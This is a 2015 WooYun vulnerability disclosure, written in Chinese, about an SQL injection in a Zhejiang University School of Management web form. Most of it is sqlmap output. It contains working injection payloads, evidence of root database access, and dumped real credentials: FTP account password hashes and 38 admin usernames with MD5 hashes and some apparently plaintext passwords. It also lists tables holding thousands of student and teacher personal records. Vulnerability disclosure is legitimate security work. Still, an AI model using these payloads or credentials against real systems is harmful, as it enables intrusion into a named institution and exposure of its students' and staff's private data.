当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154890

漏洞标题:浙江大学管理学院SQL注入,相关多个学院数据库沦陷root权限

相关厂商:浙江大学

漏洞作者: 40huo

提交时间:2015-11-26 22:25

修复时间:2015-12-01 22:26

公开时间:2015-12-01 22:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

post注入
多个数据库沦陷

详细说明:

注入点:
http://**.**.**.**/e/enews/index.php
注入类型:

---
Parameter: name (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=


---
[17:20:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
---


root权限:

web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[23:12:08] [INFO] fetching current user
[23:12:08] [INFO] resumed: root@localhost
current user: 'root@localhost'

漏洞证明:

涉及多个学院数据库:

sqlmap identified the following injection point(s) with a total of 1136 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [14]:
[*] ftp
[*] information_schema
[*] mysql
[*] test
[*] usr_zjuemba
[*] zheda
[*] zju_cma
[*] zju_emba
[*] zju_gep
[*] zju_gmc
[*] zju_jcie
[*] zju_niim
[*] zju_som
[*] zju_vote


所有站点ftp账号密码泄露:

Database: ftp
Table: users
[10 entries]
+----+------+------+-------------+---------+---------------+---------------------------+---------+---------------------+---------------------+
| id | gid | uid | userid | shell | passwd | homedir | count | lastlogin | lastlogout |
+----+------+------+-------------+---------+---------------+---------------------------+---------+---------------------+---------------------+
| 1 | 1000 | 1000 | bak | <blank> | RQdSXtbKHJpQc | /home/bak/ | 1265 | 2015-11-20 06:01:26 | 2015-11-20 06:01:49 |
| 2 | 1000 | 1000 | web | <blank> | NMeksVb/ZqZlw | /home/www/zju_cma | 70 | 2015-03-10 11:11:05 | 2015-03-10 11:11:37 |
| 3 | 1000 | 1000 | cbnet | <blank> | YLOTe6F1B0VLc | /home/www | 2162 | 2015-11-10 12:36:55 | 2015-11-10 12:37:18 |
| 4 | 1000 | 1000 | log | <blank> | Je5h82zwXSj7c | /var/log/httpd | 24 | 2015-11-20 07:55:58 | 2015-11-20 07:56:22 |
| 5 | 1000 | 1000 | cbnetbak | <blank> | an9YOUS1jqAIg | /home/bak | 9 | 2015-03-06 08:45:06 | 2015-03-06 08:55:56 |
| 6 | 1000 | 1000 | zjusom | <blank> | in8Cti.VNGf1E | /home/www/zju_som | 22 | 2015-05-06 12:14:21 | 2015-05-06 12:19:41 |
| 7 | 1000 | 1000 | **.**.**.** | <blank> | v3FedKzdZDlPQ | /home/www/**.**.**.** | 225 | 2014-10-09 07:33:59 | 2014-10-09 07:38:08 |
| 8 | 1000 | 1000 | lxt | <blank> | RkH7YkeuqsKkM | /home/www/ | 1186 | 2015-10-15 12:16:46 | 2015-10-15 12:17:48 |
| 9 | 1000 | 1000 | zju_emba | <blank> | FUx2VZdQyJKcs | /home/www/**.**.**.** | 1074 | 2015-09-10 15:35:31 | 2015-09-10 15:44:18 |
| 11 | 1000 | 1000 | 35year | <blank> | jNXvBY6A9Nl0A | /home/www/zju_som/35year | 108 | 2015-07-06 21:12:57 | 2015-07-06 21:22:05 |


数千条学生教师基本信息泄露(包括姓名学号班级专业,家庭住址,简历等):

+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| student_login_log | 118955 |
| teacher_login_log | 32051 |
| article | 23158 |
| admin_log | 19863 |
| article20110418 | 16533 |
| cma_news | 13284 |
| admin_login_log | 10417 |
| meeting | 7291 |
| student | 3495 |学生信息表
| student20120306 | 2797 |
| student20110919 | 2470 |
| student20110909 | 2314 |
| student20110331 | 2089 |
| article_baoming | 1538 |
| zt_xly2011_baoming | 1161 |
| zt_xly2013_baoming | 980 |
| zt_xly2010_baoming | 849 |
| zt_xly2014_baoming | 822 |
| zt_xly2012_baoming | 632 |
| student20121022 | 446 |
| zt_yx2011_baoming | 396 |
| teacher | 311 |教师信息表
| article_cate | 169 |
| base_info | 88 |
| friends | 57 |
| dept | 49 |
| upload_files | 43 |
| admin_user | 38 |
| zt_cate | 22 |
| zt_yx2011_jiabin | 15 |
| base_cate | 9 |
| room | 9 |
| en_index_pic | 7 |
| friend_cate | 6 |
| zt_huodong | 6 |
| gundong | 5 |
| peiyang | 4 |
| photo | 4 |
| teacher_bak | 4 |
| article_wcate | 3 |
| faqs | 3 |
| qa_cate | 3 |
| class | 2 |
| zhuanye | 2 |
| zt_info | 2 |
| sitemap | 1 |
+--------------------+---------+


后台管理员账号密码泄露:

Database: zju_som
Table: admin_user
[38 entries]
+------------+----------------------------------+
| username | password |
+------------+----------------------------------+
| xyb | 1a78e00f947d922875b4fa035a7746e9 |
| lib | 1b8e2eedc760a5157e1c454882f49d5b |
| gzfh | 29ca867cfdc823a39185802165ea9ed0 |
| bkssz | 2d12f9a3e83a401dfa824b9eb91b45d1 |
| hzfh | 37b0f998f7e024ee253c2927eedd4fe5 |
| cdc | 3a5e33237a0967d899ff9c0982814a03 |
| card | 3lzjugk9010192 |
| kjx | 4173a1ba1d52a39847eefbd1b61a2e35 |
| zsyjy | 43f2e1338801e44728f766a80ca9c5e1 |
| amtc | 4ebf3ac052c754abe7ae8ef057e924bf |
| lab | 57f1b47bce0d9519ed5ad6314eeff98f |
| rsk | 6u7cugwa8jl4j7zm |
| shfh | 72c446807f367c2d692eb58058e75c34 |
| hxc | 81304745cc82d4a40fb1f5101a147859 |
| jykj | 8731323a909ba0422e0ab67dd6861fe2 |
| rzb | 8b5f4ffc8f94bddee54520f11063ee1b |
| alzx | 96e79218965eb72c92a549dd5a330112 |
| bjfh | a772bf7849c7dc7963b97aba5add09aa |
| yjsjy | aeee7575b44211014bbdaf4af5dd4f36 |
| zjuc | b0edbda8f13bf3ad582744f135241670 |
| admin51yfg | b30d46a395ddf29de329feb886939461 |
| zjl | b3275960d68fda9d831facc0426c3bbc |
| admin36zgf | cd5b42d74fd56bb8604d13f8701ef316 |
| lyx | da93c5eaf76c613c4032f382809d42a4 |
| szfh | dc20cd2454dcdafad3f94abc7585e661 |
| kyk | dm6utkj78j01k9 |
| gjjl | dm6utkj78j01k9 |
| qgx | e2e425bf9b850789373ee6e608eb4f5a |
| yjssz | e64d1056f0274a1017766efea59f0ac1 |
| ggx | f379eaf3c831b04de153469d1bec345e |
| dzb | f379eaf3c831b04de153469d1bec345e |
| jxx | f379eaf3c831b04de153469d1bec345e |
| wzfh | f9f6f822a60a4dd253a21f26de86382b |
| niim | gbq2dmaq5l0101l4 |
| gh | k9r38jx08j3h |
| lxd | l4l443l401l4l43h |
| emba | m7gb21211wgb0paq |
| mba | tk3l3l%@odk9k9 |
+------------+----------------------------------+


后台可进
怕开除,不搞了,就这样吧。

修复方案:

过滤

版权声明:转载请注明来源 40huo@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-01 22:26

厂商回复:

最新状态:

暂无